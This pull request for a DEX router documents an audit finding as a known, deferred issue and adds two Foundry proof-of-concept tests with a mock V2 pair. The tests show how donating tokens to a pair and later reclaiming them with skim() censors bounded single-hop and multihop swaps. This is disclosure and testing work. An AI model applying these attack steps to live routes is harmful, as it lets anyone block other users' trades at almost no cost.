### PR TITLE
docs: record the V2 per-hop bound donation limitation as a known issue

### DIFF
--- a/contracts/modules/uniswap/v2/V2SwapRouter.sol
+++ b/contracts/modules/uniswap/v2/V2SwapRouter.sol
@@ -30,6 +30,14 @@ abstract contract V2SwapRouter is UniswapImmutables, Permit2Payments {
                 (uint256 reserve0, uint256 reserve1,) = IUniswapV2Pair(pair).getReserves();
                 (uint256 reserveInput, uint256 reserveOutput) =
                     input == token0 ? (reserve0, reserve1) : (reserve1, reserve0);
+                // KNOWN ISSUE (audit L-01, fix deferred): amountInput is the pair's whole balance
+                // excess, so it counts tokens any third party transferred in. A larger apparent trade
+                // earns a worse average rate, so a donation drives the price below minHopPriceX36 and
+                // reverts a bounded route; the pair's permissionless skim() then returns the donation.
+                // No funds are at risk, the effect is censorship of routes that set a nonzero bound.
+                // Attributing the caller's own input does not close it on multihop routes: hop 0 swaps
+                // the donation, so hop 1 receives genuinely more input and honestly measures a worse
+                // rate. See test/foundry-tests/V2PerHopDonationMultihop.t.sol.
                 uint256 amountInput = ERC20(input).balanceOf(pair) - reserveInput;
                 uint256 amountOutput = UniswapV2Library.getAmountOut(amountInput, reserveInput, reserveOutput);
                 (uint256 amount0Out, uint256 amount1Out) =
@@ -64,6 +72,9 @@ abstract contract V2SwapRouter is UniswapImmutables, Permit2Payments {
     /// @param path The path of the trade as an array of token addresses
     /// @param payer The address that will be paying the input
     /// @param minHopPriceX36 Per-hop minimum price array in 1e36 precision (empty to disable)
+    /// @dev KNOWN ISSUE (audit L-01, fix deferred): a nonzero bound can be tripped by anyone
+    /// transferring tokens to a pair in the path, censoring the route at no net cost to them. See
+    /// the note in _v2Swap.
     function v2SwapExactInput(
         address recipient,
         uint256 amountIn,
@@ -101,6 +112,9 @@ abstract contract V2SwapRouter is UniswapImmutables, Permit2Payments {
     /// @param path The path of the trade as an array of token addresses
     /// @param payer The address that will be paying the input
     /// @param minHopPriceX36 Per-hop minimum price array in 1e36 precision (empty to disable)
+    /// @dev KNOWN ISSUE (audit L-01, fix deferred): a nonzero bound can be tripped by anyone
+    /// transferring tokens to a pair in the path, censoring the route at no net cost to them. See
+    /// the note in _v2Swap.
     function v2SwapExactOutput(
         address recipient,
         uint256 amountOut,

--- a/contracts/modules/uniswap/v3/V3SwapRouter.sol
+++ b/contracts/modules/uniswap/v3/V3SwapRouter.sol
@@ -112,6 +112,11 @@ abstract contract V3SwapRouter is UniswapImmutables, Permit2Payments, IUniswapV3
         ) revert V3HopPriceAndPathLengthMismatch();
 
         // use amountIn == ActionConstants.CONTRACT_BALANCE as a flag to swap the entire balance of the contract
+        // KNOWN ISSUE (related to audit L-01, fix deferred): balanceOf includes tokens any third party
+        // sent to the router, so a donation enlarges the trade. The larger trade earns a worse average
+        // rate, which can trip minHopPriceX36 and revert the route, and SWEEP takes an arbitrary
+        // recipient so the donation is recoverable. V3's per-hop denominator is itself sound: it
+        // divides by the pool's callback amountToPay, not by a balance.
         if (amountIn == ActionConstants.CONTRACT_BALANCE) {
             address tokenIn = path.decodeFirstToken();
             amountIn = ERC20(tokenIn).balanceOf(address(this));

--- a/test/foundry-tests/V2PerHopDonationMultihop.t.sol
+++ b/test/foundry-tests/V2PerHopDonationMultihop.t.sol
@@ -1,0 +1,202 @@
+// SPDX-License-Identifier: UNLICENSED
+pragma solidity ^0.8.24;
+
+import 'forge-std/Test.sol';
+import {UniversalRouter} from '../../contracts/UniversalRouter.sol';
+import {V2SwapRouter} from '../../contracts/modules/uniswap/v2/V2SwapRouter.sol';
+import {UniswapV2Library} from '../../contracts/modules/uniswap/v2/UniswapV2Library.sol';
+import {Commands} from '../../contracts/libraries/Commands.sol';
+import {Constants} from '../../contracts/libraries/Constants.sol';
+import {RouterParameters} from '../../contracts/types/RouterParameters.sol';
+import {MockERC20} from './mock/MockERC20.sol';
+import {MockV2Pair, MockV2Factory} from './mock/MockV2Pair.sol';
+
+/// @notice KNOWN ISSUE, documented rather than fixed. Multihop counterpart to V2PerHopDonationPoC.
+///
+/// The single-hop PoC shows a donation to the swapped pair inflating that hop's price denominator.
+/// This file covers the case that decides whether input attribution can fix it: a donation to
+/// pair 0 of a two-hop route, with hop 0's bound DISABLED and only hop 1's bound set.
+///
+/// Hop 0 swaps the donation, so the proceeds physically arrive at pair 1. Hop 1 therefore receives
+/// genuinely more input and honestly measures a worse rate. Attributing the victim's share of
+/// hop 0's input fixes hop 0 and leaves hop 1 open, and censorship needs only one hop to fail.
+///
+/// See contracts/modules/uniswap/v2/V2SwapRouter.sol for the deferred-fix note.
+contract V2PerHopDonationMultihopTest is Test {
+    uint256 constant R0_A = 10_000 ether; // pair0 reserves, A side
+    uint256 constant R0_B = 10_000 ether; // pair0 reserves, B side
+    uint256 constant R1_B = 10_000 ether; // pair1 reserves, B side
+    uint256 constant R1_C = 20_000 ether; // pair1 reserves, C side
+
+    uint256 constant SWAP_IN = 10 ether;
+    uint256 constant TOLERANCE_BPS = 50; // 0.50% per-hop tolerance
+
+    address constant VICTIM = address(0x1C71);
+    address constant ATTACKER = address(0xA77ACC);
+    address constant RECIPIENT = address(0xBEEF);
+
+    UniversalRouter router;
+    MockV2Factory factory;
+    MockERC20 tokenA;
+    MockERC20 tokenB;
+    MockERC20 tokenC;
+    MockV2Pair pair0; // A/B
+    MockV2Pair pair1; // B/C
+
+    function setUp() public {
+        tokenA = new MockERC20();
+        tokenB = new MockERC20();
+        tokenC = new MockERC20();
+
+        factory = new MockV2Factory();
+        pair0 = MockV2Pair(factory.createPair(address(tokenA), address(tokenB)));
+        pair1 = MockV2Pair(factory.createPair(address(tokenB), address(tokenC)));
+
+        tokenA.mint(address(pair0), R0_A);
+        tokenB.mint(address(pair0), R0_B);
+        pair0.sync();
+
+        tokenB.mint(address(pair1), R1_B);
+        tokenC.mint(address(pair1), R1_C);
+        pair1.sync();
+
+        RouterParameters memory params = RouterParameters({
+            permit2: address(0xdead),
+            weth9: address(0),
+            v2Factory: address(factory),
+            v3Factory: address(0),
+            pairInitCodeHash: factory.pairInitCodeHash(),
+            poolInitCodeHash: bytes32(0),
+            v4PoolManager: address(0),
+            permissionsAdapterFactory: address(0),
+            v3NFTPositionManager: address(0),
+            v4PositionManager: address(0),
+            spokePool: address(0)
+        });
+        router = new UniversalRouter(params);
+    }
+
+    function _path() internal view returns (address[] memory path) {
+        path = new address[](3);
+        path[0] = address(tokenA);
+        path[1] = address(tokenB);
+        path[2] = address(tokenC);
+    }
+
+    function _trySwap(uint256 amountIn, uint256[] memory hopBounds) internal returns (bool ok, bytes memory ret) {
+        tokenA.mint(address(router), amountIn);
+
+        bytes memory commands = abi.encodePacked(bytes1(uint8(Commands.V2_SWAP_EXACT_IN)));
+        bytes[] memory inputs = new bytes[](1);
+        inputs[0] = abi.encode(RECIPIENT, amountIn, uint256(0), _path(), false, hopBounds);
+
+        vm.prank(VICTIM);
+        (ok, ret) = address(router).call(abi.encodeWithSignature('execute(bytes,bytes[])', commands, inputs));
+    }
+
+    /// @dev Reserves ordered as (reserveIn, reserveOut) for a directional hop
+    function _reserves(MockV2Pair p, address input) internal view returns (uint256 rIn, uint256 rOut) {
+        (uint112 r0, uint112 r1,) = p.getReserves();
+        (rIn, rOut) = input == p.token0() ? (uint256(r0), uint256(r1)) : (uint256(r1), uint256(r0));
+    }
+
+    /// @dev What hop 1 measures as its input/output when `donation` sits at pair 0 beforehand
+    function _hop1Measured(uint256 donation) internal view returns (uint256 hop1In, uint256 hop1Out) {
+        (uint256 r0In, uint256 r0Out) = _reserves(pair0, address(tokenA));
+        (uint256 r1In, uint256 r1Out) = _reserves(pair1, address(tokenB));
+        hop1In = UniswapV2Library.getAmountOut(SWAP_IN + donation, r0In, r0Out);
+        hop1Out = UniswapV2Library.getAmountOut(hop1In, r1In, r1Out);
+    }
+
+    function _hop1Price(uint256 donation) internal view returns (uint256) {
+        (uint256 hop1In, uint256 hop1Out) = _hop1Measured(donation);
+        return hop1Out * Constants.PRICE_PRECISION / hop1In;
+    }
+
+    /// @dev The hop-1 bound an honest router would compute from a clean quote
+    function _honestHop1Bound() internal view returns (uint256) {
+        return _hop1Price(0) * (10_000 - TOLERANCE_BPS) / 10_000;
+    }
+
+    function _minimalCensoringDonation(uint256 minPrice) internal view returns (uint256) {
+        uint256 lo = 0;
+        uint256 hi = R0_A;
+        require(_hop1Price(hi) < minPrice, 'no donation can censor at these params');
+        while (lo < hi) {
+            uint256 mid = (lo + hi) / 2;
+            if (_hop1Price(mid) < minPrice) hi = mid;
+            else lo = mid + 1;
+        }
+        return lo;
+    }
+
+    /// @dev hop 0 disabled, hop 1 bounded -- isolates hop 1 as the failing check
+    function _hop1Only(uint256 bound) internal pure returns (uint256[] memory a) {
+        a = new uint256[](2);
+        a[0] = 0;
+        a[1] = bound;
+    }
+
+    function _stripSelector(bytes memory data) internal pure returns (bytes memory out) {
+        out = new bytes(data.length - 4);
+        for (uint256 i; i < out.length; i++) {
+            out[i] = data[i + 4];
+        }
+    }
+
+    function test_baseline_boundedMultihopRouteSucceeds() public {
+        (bool ok,) = _trySwap(SWAP_IN, _hop1Only(_honestHop1Bound()));
+        assertTrue(ok, 'honest bounded route should succeed');
+        assertGt(tokenC.balanceOf(RECIPIENT), 0, 'victim received nothing');
+    }
+
+    /// @notice The route is censored at hop 1, whose own pair was never touched. Hop 0's bound is
+    /// zero here, so correcting hop 0's denominator could not have prevented this.
+    function test_donationToPair0_censorsRouteAtHop1() public {
+        uint256 minPrice = _honestHop1Bound();
+        uint256 donation = _minimalCensoringDonation(minPrice);
+
+        emit log_named_decimal_uint('victim input                   ', SWAP_IN, 18);
+        emit log_named_decimal_uint('minimal donation to pair 0     ', donation, 18);
+        emit log_named_uint('  as bps of pair0 input reserve', donation * 10_000 / R0_A);
+
+        (uint256 honestHop1In,) = _hop1Measured(0);
+        (uint256 attackedHop1In,) = _hop1Measured(donation);
+        emit log_named_decimal_uint('B reaching pair1, honest       ', honestHop1In, 18);
+        emit log_named_decimal_uint('B reaching pair1, attacked     ', attackedHop1In, 18);
+
+        tokenA.mint(ATTACKER, donation);
+        uint256 attackerStart = tokenA.balanceOf(ATTACKER);
+
+        // tx1: donate to pair 0
+        vm.prank(ATTACKER);
+        tokenA.transfer(address(pair0), donation);
+
+        // tx2: the victim's route reverts at hop 1
+        (bool ok, bytes memory ret) = _trySwap(SWAP_IN, _hop1Only(minPrice));
+        assertFalse(ok, 'bounded route should have been censored');
+        assertEq(
+            bytes4(ret),
+            V2SwapRouter.V2TooLittleReceivedPerHop.selector,
+            'expected the per-hop bound to be what rejected the route'
+        );
+        (uint256 hopIndex,,) = abi.decode(_stripSelector(ret), (uint256, uint256, uint256));
+        assertEq(hopIndex, 1, 'hop 1 should be the failing hop, not hop 0');
+        assertEq(tokenC.balanceOf(RECIPIENT), 0, 'victim route should have been censored');
+
+        // tx3: the donation is still unsynced excess at pair 0, so skim returns it
+        pair0.skim(ATTACKER);
+        assertEq(tokenA.balanceOf(ATTACKER), attackerStart, 'attacker did not fully recover donation');
+
+        emit log_string('censored at hop 1 and recovered 100% of donated principal');
+    }
+
+    /// @dev The donation increases what the route itself delivers to pair 1, so there is nothing
+    /// foreign left at hop 1 for an attribution scheme to exclude.
+    function test_donationIncreasesFlowThroughPair1() public view {
+        uint256 donation = _minimalCensoringDonation(_honestHop1Bound());
+        (uint256 honestHop1In,) = _hop1Measured(0);
+        (uint256 attackedHop1In,) = _hop1Measured(donation);
+        assertGt(attackedHop1In, honestHop1In, 'donation should increase input reaching pair 1');
+    }
+}

--- a/test/foundry-tests/V2PerHopDonationPoC.t.sol
+++ b/test/foundry-tests/V2PerHopDonationPoC.t.sol
@@ -1,0 +1,263 @@
+// SPDX-License-Identifier: UNLICENSED
+pragma solidity ^0.8.24;
+
+import 'forge-std/Test.sol';
+import {ERC20} from 'solmate/src/tokens/ERC20.sol';
+import {UniversalRouter} from '../../contracts/UniversalRouter.sol';
+import {V2SwapRouter} from '../../contracts/modules/uniswap/v2/V2SwapRouter.sol';
+import {UniswapV2Library} from '../../contracts/modules/uniswap/v2/UniswapV2Library.sol';
+import {Commands} from '../../contracts/libraries/Commands.sol';
+import {Constants} from '../../contracts/libraries/Constants.sol';
+import {RouterParameters} from '../../contracts/types/RouterParameters.sol';
+import {MockERC20} from './mock/MockERC20.sol';
+import {MockV2Pair, MockV2Factory} from './mock/MockV2Pair.sol';
+
+/// @notice PoC for: attacker-donated tokens inflate the per-hop price denominator, causing a bounded
+/// V2 route to revert even though the donation strictly improves the victim's output. The donation is
+/// recoverable via the pair's permissionless skim().
+///
+/// Root cause, V2SwapRouter.sol:33 and :49 --
+///     uint256 amountInput = ERC20(input).balanceOf(pair) - reserveInput;  // includes anyone's donation
+///     uint256 price = amountOutput * Constants.PRICE_PRECISION / amountInput;
+contract V2PerHopDonationPoC is Test {
+    uint256 constant RESERVE_IN = 10_000 ether;
+    uint256 constant RESERVE_OUT = 20_000 ether;
+    uint256 constant SWAP_IN = 10 ether;
+    uint256 constant TOLERANCE_BPS = 50; // 0.50% per-hop slippage tolerance
+
+    address constant VICTIM = address(0x1C71);
+    address constant ATTACKER = address(0xA77ACC);
+    address constant RECIPIENT = address(0xBEEF);
+
+    UniversalRouter router;
+    MockV2Factory factory;
+    MockV2Pair pair;
+    MockERC20 tokenIn;
+    MockERC20 tokenOut;
+
+    function setUp() public {
+        tokenIn = new MockERC20();
+        tokenOut = new MockERC20();
+
+        factory = new MockV2Factory();
+        pair = MockV2Pair(factory.createPair(address(tokenIn), address(tokenOut)));
+
+        // Seed a deep pool
+        tokenIn.mint(address(pair), RESERVE_IN);
+        tokenOut.mint(address(pair), RESERVE_OUT);
+        pair.sync();
+
+        RouterParameters memory params = RouterParameters({
+            permit2: address(0xdead),
+            weth9: address(0),
+            v2Factory: address(factory),
+            v3Factory: address(0),
+            pairInitCodeHash: factory.pairInitCodeHash(),
+            poolInitCodeHash: bytes32(0),
+            v4PoolManager: address(0),
+            permissionsAdapterFactory: address(0),
+            v3NFTPositionManager: address(0),
+            v4PositionManager: address(0),
+            spokePool: address(0)
+        });
+        router = new UniversalRouter(params);
+
+        // Sanity: the router must derive the same pair address we deployed
+        assertEq(
+            UniswapV2Library.pairFor(
+                address(factory), factory.pairInitCodeHash(), address(tokenIn), address(tokenOut)
+            ),
+            address(pair),
+            'pair address derivation mismatch'
+        );
+    }
+
+    /// @dev Router-funded swap: victim moves input to the router, then executes with payerIsUser=false.
+    /// The defect lives entirely inside _v2Swap and is independent of how the input is funded.
+    function _swap(uint256 amountIn, uint256[] memory minHopPriceX36) internal {
+        tokenIn.mint(address(router), amountIn);
+
+        address[] memory path = new address[](2);
+        path[0] = address(tokenIn);
+        path[1] = address(tokenOut);
+
+        bytes memory commands = abi.encodePacked(bytes1(uint8(Commands.V2_SWAP_EXACT_IN)));
+        bytes[] memory inputs = new bytes[](1);
+        inputs[0] = abi.encode(RECIPIENT, amountIn, uint256(0), path, false, minHopPriceX36);
+
+        vm.prank(VICTIM);
+        router.execute(commands, inputs);
+    }
+
+    function _trySwap(uint256 amountIn, uint256[] memory minHopPriceX36)
+        internal
+        returns (bool ok, bytes memory ret)
+    {
+        tokenIn.mint(address(router), amountIn);
+
+        address[] memory path = new address[](2);
+        path[0] = address(tokenIn);
+        path[1] = address(tokenOut);
+
+        bytes memory commands = abi.encodePacked(bytes1(uint8(Commands.V2_SWAP_EXACT_IN)));
+        bytes[] memory inputs = new bytes[](1);
+        inputs[0] = abi.encode(RECIPIENT, amountIn, uint256(0), path, false, minHopPriceX36);
+
+        vm.prank(VICTIM);
+        (ok, ret) = address(router).call(abi.encodeWithSignature('execute(bytes,bytes[])', commands, inputs));
+    }
+
+    /// @dev The per-hop bound an honest router would compute from a clean quote
+    function _honestBound() internal pure returns (uint256) {
+        uint256 quotedOut = UniswapV2Library.getAmountOut(SWAP_IN, RESERVE_IN, RESERVE_OUT);
+        uint256 quotedPrice = quotedOut * Constants.PRICE_PRECISION / SWAP_IN;
+        return quotedPrice * (10_000 - TOLERANCE_BPS) / 10_000;
+    }
+
+    function _bound1(uint256 v) internal pure returns (uint256[] memory a) {
+        a = new uint256[](1);
+        a[0] = v;
+    }
+
+    // ------------------------------------------------------------------
+    // 1. Baseline: the bounded swap succeeds when nobody interferes
+    // ------------------------------------------------------------------
+    function test_baseline_boundedSwapSucceeds() public {
+        _swap(SWAP_IN, _bound1(_honestBound()));
+        assertGt(tokenOut.balanceOf(RECIPIENT), 0, 'victim received nothing');
+    }
+
+    // ------------------------------------------------------------------
+    // 2. The donation makes the victim strictly BETTER off when unbounded
+    // ------------------------------------------------------------------
+    function test_donationImprovesOutputWhenUnbounded() public {
+        uint256 snap = vm.snapshotState();
+
+        _swap(SWAP_IN, new uint256[](0));
+        uint256 outWithoutDonation = tokenOut.balanceOf(RECIPIENT);
+
+        vm.revertToState(snap);
+
+        uint256 donation = 60 ether;
+        tokenIn.mint(ATTACKER, donation);
+        vm.prank(ATTACKER);
+        tokenIn.transfer(address(pair), donation);
+
+        _swap(SWAP_IN, new uint256[](0));
+        uint256 outWithDonation = tokenOut.balanceOf(RECIPIENT);
+
+        emit log_named_decimal_uint('output without donation', outWithoutDonation, 18);
+        emit log_named_decimal_uint('output with donation   ', outWithDonation, 18);
+
+        // Victim paid the same SWAP_IN in both cases but receives more with the donation present
+        assertGt(outWithDonation, outWithoutDonation, 'donation should improve victim output');
+    }
+
+    // ------------------------------------------------------------------
+    // 3. The exploit: same donation makes the BOUNDED swap revert
+    // ------------------------------------------------------------------
+    function test_PoC_donationCensorsBoundedSwap() public {
+        uint256 minPrice = _honestBound();
+
+        // Minimal donation that pushes the computed price under the victim's bound
+        uint256 donation = _minimalCensoringDonation(minPrice);
+        emit log_named_decimal_uint('reserve (input side)   ', RESERVE_IN, 18);
+        emit log_named_decimal_uint('victim swap input      ', SWAP_IN, 18);
+        emit log_named_decimal_uint('minimal donation needed', donation, 18);
+        emit log_named_uint('donation as bps of reserve', donation * 10_000 / RESERVE_IN);
+
+        tokenIn.mint(ATTACKER, donation);
+        uint256 attackerStart = tokenIn.balanceOf(ATTACKER);
+
+        // --- tx1: attacker donates to the pair
+        vm.prank(ATTACKER);
+        tokenIn.transfer(address(pair), donation);
+
+        // --- tx2: victim's bounded route now reverts
+        emit log_named_uint('minPrice                ', minPrice);
+        emit log_named_uint('modelled price w/ donation', _priceWithDonation(donation));
+        (bool ok, bytes memory ret) = _trySwap(SWAP_IN, _bound1(minPrice));
+        emit log_named_string('swap reverted?', ok ? 'NO' : 'YES');
+        if (!ok) emit log_named_bytes('revert data', ret);
+        assertFalse(ok, 'bounded swap should have been censored');
+
+        assertEq(tokenOut.balanceOf(RECIPIENT), 0, 'victim route should have been censored');
+
+        // --- tx3: attacker recovers the donation via permissionless skim
+        pair.skim(ATTACKER);
+        assertEq(tokenIn.balanceOf(ATTACKER), attackerStart, 'attacker did not fully recover donation');
+
+        emit log_string('censored victim route and recovered 100% of donated principal');
+    }
+
+    // ------------------------------------------------------------------
+    // 4. Attack cost: donation scales with the POOL, not the victim's trade
+    // ------------------------------------------------------------------
+    function test_attackCostAcrossTolerances() public {
+        uint256[4] memory tolerances = [uint256(10), 50, 100, 300];
+        for (uint256 i; i < tolerances.length; i++) {
+            uint256 quotedOut = UniswapV2Library.getAmountOut(SWAP_IN, RESERVE_IN, RESERVE_OUT);
+            uint256 minPrice = (quotedOut * Constants.PRICE_PRECISION / SWAP_IN) * (10_000 - tolerances[i]) / 10_000;
+            uint256 d = _minimalCensoringDonation(minPrice);
+            emit log_named_uint('tolerance (bps)', tolerances[i]);
+            emit log_named_decimal_uint('  donation needed', d, 18);
+            emit log_named_uint('  as bps of input reserve', d * 10_000 / RESERVE_IN);
+            emit log_named_uint('  as multiple of victim trade', d / SWAP_IN);
+        }
+    }
+
+    /// @dev Same tolerance, 10x larger victim trade -> essentially the same donation.
+    function test_attackCostIndependentOfVictimTradeSize() public {
+        uint256 minPriceSmall = _honestBound();
+        uint256 dSmall = _minimalCensoringDonation(minPriceSmall);
+
+        uint256 bigIn = SWAP_IN * 10;
+        uint256 quotedOutBig = UniswapV2Library.getAmountOut(bigIn, RESERVE_IN, RESERVE_OUT);
+        uint256 minPriceBig = (quotedOutBig * Constants.PRICE_PRECISION / bigIn) * (10_000 - TOLERANCE_BPS) / 10_000;
+        uint256 dBig = _minimalCensoringDonationFor(bigIn, minPriceBig);
+
+        emit log_named_decimal_uint('donation to censor 10 ether trade ', dSmall, 18);
+        emit log_named_decimal_uint('donation to censor 100 ether trade', dBig, 18);
+        // Within 20% despite a 10x larger victim trade
+        assertLt(dBig, dSmall * 12 / 10, 'attack cost should be driven by reserves, not trade size');
+    }
+
+    // ------------------------------------------------------------------
+    // Helpers mirroring the router's on-chain math
+    // ------------------------------------------------------------------
+    function _priceFor(uint256 amountIn, uint256 donation) internal pure returns (uint256) {
+        uint256 amountInput = amountIn + donation;
+        uint256 amountOutput = UniswapV2Library.getAmountOut(amountInput, RESERVE_IN, RESERVE_OUT);
+        return amountOutput * Constants.PRICE_PRECISION / amountInput;
+    }
+
+    function _minimalCensoringDonationFor(uint256 amountIn, uint256 minPrice) internal pure returns (uint256) {
+        uint256 lo = 0;
+        uint256 hi = RESERVE_IN;
+        require(_priceFor(amountIn, hi) < minPrice, 'no donation can censor at these params');
+        while (lo < hi) {
+            uint256 mid = (lo + hi) / 2;
+            if (_priceFor(amountIn, mid) < minPrice) hi = mid;
+            else lo = mid + 1;
+        }
+        return lo;
+    }
+
+    function _priceWithDonation(uint256 donation) internal pure returns (uint256) {
+        uint256 amountInput = SWAP_IN + donation;
+        uint256 amountOutput = UniswapV2Library.getAmountOut(amountInput, RESERVE_IN, RESERVE_OUT);
+        return amountOutput * Constants.PRICE_PRECISION / amountInput;
+    }
+
+    function _minimalCensoringDonation(uint256 minPrice) internal pure returns (uint256) {
+        uint256 lo = 0;
+        uint256 hi = RESERVE_IN;
+        require(_priceWithDonation(hi) < minPrice, 'no donation can censor at these params');
+        while (lo < hi) {
+            uint256 mid = (lo + hi) / 2;
+            if (_priceWithDonation(mid) < minPrice) hi = mid;
+            else lo = mid + 1;
+        }
+        return lo;
+    }
+}

--- a/test/foundry-tests/mock/MockV2Pair.sol
+++ b/test/foundry-tests/mock/MockV2Pair.sol
@@ -1,0 +1,102 @@
+// SPDX-License-Identifier: UNLICENSED
+pragma solidity ^0.8.24;
+
+import {ERC20} from 'solmate/src/tokens/ERC20.sol';
+
+/// @notice Minimal but faithful port of UniswapV2Pair's swap/skim/sync/getReserves semantics.
+/// @dev The constructor takes no arguments so that the CREATE2 init code hash is stable, matching the
+/// real UniswapV2Factory deployment scheme that UniswapV2Library.pairFor depends on.
+contract MockV2Pair {
+    error Locked();
+    error InsufficientOutputAmount();
+    error InsufficientLiquidity();
+    error InsufficientInputAmount();
+    error KInvariant();
+    error Overflow();
+
+    address public token0;
+    address public token1;
+
+    uint112 private _reserve0;
+    uint112 private _reserve1;
+    uint32 private _blockTimestampLast;
+
+    uint256 private _unlocked = 1;
+
+    modifier lock() {
+        if (_unlocked != 1) revert Locked();
+        _unlocked = 0;
+        _;
+        _unlocked = 1;
+    }
+
+    function initialize(address tokenA, address tokenB) external {
+        token0 = tokenA;
+        token1 = tokenB;
+    }
+
+    function getReserves() public view returns (uint112, uint112, uint32) {
+        return (_reserve0, _reserve1, _blockTimestampLast);
+    }
+
+    function _update(uint256 balance0, uint256 balance1) private {
+        if (balance0 > type(uint112).max || balance1 > type(uint112).max) revert Overflow();
+        _reserve0 = uint112(balance0);
+        _reserve1 = uint112(balance1);
+        _blockTimestampLast = uint32(block.timestamp);
+    }
+
+    function sync() external lock {
+        _update(ERC20(token0).balanceOf(address(this)), ERC20(token1).balanceOf(address(this)));
+    }
+
+    /// @notice Permissionless recovery of any balance held in excess of recorded reserves
+    function skim(address to) external lock {
+        address tokenA = token0;
+        address tokenB = token1;
+        ERC20(tokenA).transfer(to, ERC20(tokenA).balanceOf(address(this)) - _reserve0);
+        ERC20(tokenB).transfer(to, ERC20(tokenB).balanceOf(address(this)) - _reserve1);
+    }
+
+    function swap(uint256 amount0Out, uint256 amount1Out, address to, bytes calldata) external lock {
+        if (amount0Out == 0 && amount1Out == 0) revert InsufficientOutputAmount();
+        (uint112 reserve0_, uint112 reserve1_,) = getReserves();
+        if (amount0Out >= reserve0_ || amount1Out >= reserve1_) revert InsufficientLiquidity();
+
+        if (amount0Out > 0) ERC20(token0).transfer(to, amount0Out);
+        if (amount1Out > 0) ERC20(token1).transfer(to, amount1Out);
+
+        uint256 balance0 = ERC20(token0).balanceOf(address(this));
+        uint256 balance1 = ERC20(token1).balanceOf(address(this));
+
+        uint256 amount0In = balance0 > reserve0_ - amount0Out ? balance0 - (reserve0_ - amount0Out) : 0;
+        uint256 amount1In = balance1 > reserve1_ - amount1Out ? balance1 - (reserve1_ - amount1Out) : 0;
+        if (amount0In == 0 && amount1In == 0) revert InsufficientInputAmount();
+
+        // 0.30% fee, identical to UniswapV2Pair
+        uint256 balance0Adjusted = balance0 * 1000 - amount0In * 3;
+        uint256 balance1Adjusted = balance1 * 1000 - amount1In * 3;
+        if (balance0Adjusted * balance1Adjusted < uint256(reserve0_) * uint256(reserve1_) * (1000 ** 2)) {
+            revert KInvariant();
+        }
+
+        _update(balance0, balance1);
+    }
+}
+
+/// @notice CREATE2 factory using the same salt scheme as UniswapV2Factory
+contract MockV2Factory {
+    mapping(address => mapping(address => address)) public getPair;
+
+    function createPair(address tokenA, address tokenB) external returns (address pair) {
+        (address tokenLow, address tokenHigh) = tokenA < tokenB ? (tokenA, tokenB) : (tokenB, tokenA);
+        pair = address(new MockV2Pair{salt: keccak256(abi.encodePacked(tokenLow, tokenHigh))}());
+        MockV2Pair(pair).initialize(tokenLow, tokenHigh);
+        getPair[tokenLow][tokenHigh] = pair;
+        getPair[tokenHigh][tokenLow] = pair;
+    }
+
+    function pairInitCodeHash() external pure returns (bytes32) {
+        return keccak256(type(MockV2Pair).creationCode);
+    }
+}


### PR DESCRIPTION
Documents audit finding **L-01 (Low)** rather than fixing it. Comments and tests only — no behaviour change, bytecode unchanged.

## The issue

`_v2Swap` derives each hop's input from `balanceOf(pair) - reserveInput`, which counts tokens any third party can transfer to the pair. Because a larger apparent trade earns a worse average rate on a constant-product curve, a donation drives the measured price below `minHopPriceX36` and reverts a bounded route. The pair's permissionless `skim()` returns the donation afterwards, so censorship costs the attacker only gas and transaction ordering.

The perverse part: the donation *improves* the victim's output. They receive more tokens for the same input, and the route reverts anyway.

No funds are at risk, and the bound never lets bad execution through — the failure mode is a spurious revert. Hence Low.

## Why the fix is deferred

- The correct primitive needs routing to emit different per-hop values, so it isn't contained to this repo.
- The encoding migration needs a decision first: the field's *meaning* would change without its *type* changing, so a stale caller would be silently misread rather than rejected. That likely wants new command IDs.
- We're close to the bytecode limit and want to scope this deliberately.

Fixing in the next version.

## What's here

Two PoCs that pass against current `main`, as executable documentation:

**`V2PerHopDonationPoC.t.sol`** — single hop. Shows the donation strictly improves the victim's output when unbounded, censors the identical swap when bounded, and is fully recovered via `skim()`. Also shows attack cost scales with *pool reserves*, not the victim's trade size.

**`V2PerHopDonationMultihop.t.sol`** — two hops, with **hop 0's bound set to zero** and only hop 1 bounded. The route is still censored, at hop 1, whose own pair was never touched.

That second one is the important one: it rules out input attribution as a fix. Hop 0 *swaps* the donation, so the proceeds physically arrive at pair 1 — hop 1 then receives genuinely more input and honestly measures a worse rate. There is nothing foreign left to attribute away. Both the audit's recommended patch and the "hop i>0 denominator = previous hop's measured output" shape fail here.

Measured on a 10,000/10,000 pool with a 50 bps tolerance:

| | |
|---|---|
| victim's trade | 10 ether |
| donation to censor it | 50.96 (**50 bps of pair0's reserves**) |
| B reaching pair1, honest | 9.96 |
| B reaching pair1, attacked | 60.41 |
| donation recovered via `skim` | 100% |

## Related V3 exposure

Also noted in `V3SwapRouter.sol`: when `amountIn == CONTRACT_BALANCE` the router seeds `amountIn` from its own balance, so a donation *to the router* enlarges the trade the same way, and `SWEEP` takes an arbitrary recipient so it's recoverable. This is not in the audit report.

V3's per-hop denominator is itself sound — it divides by the pool's callback `amountToPay`, not a balance. The exposure is only that one mode, and a guard rejecting a nonzero bound under `CONTRACT_BALANCE` would close it. V4 is unaffected; its denominators are all flash-accounting deltas.

## Prototype for next version

A working reference implementation is parked on `fix/v2-hop-bound-from-reserves` (commit `47e3c4c`, **not for merge**). It replaces the ratio with a reserve-quoted bound: each entry packs `(referenceAmountIn, minAmountOut)` and the hop is checked with `getAmountOut(referenceAmountIn, reserveIn, reserveOut)` before the swap. Reading only reserves and calldata makes it immune to donations, keeps each hop independent of upstream drift, and works under `ALREADY_PAID` / `CONTRACT_BALANCE`. It also drops **282 bytes** of bytecode (23,705 → 23,423). 8 tests, all passing.

Its known gaps are recorded in that commit message.

## Verification

`forge test` — 88 passed, 0 failed (excluding the pre-existing Celo fork-test failures on `main`, which fail identically without this change).

🤖 Generated with [Claude Code](https://claude.com/claude-code)

<!-- claude-pr-description-start -->
<details>
<summary>AI-Generated Description</summary>

Documents audit finding **L-01 (Low)** rather than fixing it. Comments and tests only — no behaviour change, bytecode unchanged.
## The issue
`_v2Swap` derives each hop's input from `balanceOf(pair) - reserveInput`, which counts tokens any third party can transfer to the pair. Because a larger apparent trade earns a worse average rate on a constant-product curve, a donation drives the measured price below `minHopPriceX36` and reverts a bounded route. The pair's permissionless `skim()` returns the donation afterwards, so censorship costs the attacker only gas and transaction ordering.
No funds are at risk, and the bound never lets bad execution through — the failure mode is a spurious revert. Hence Low.
## Changes
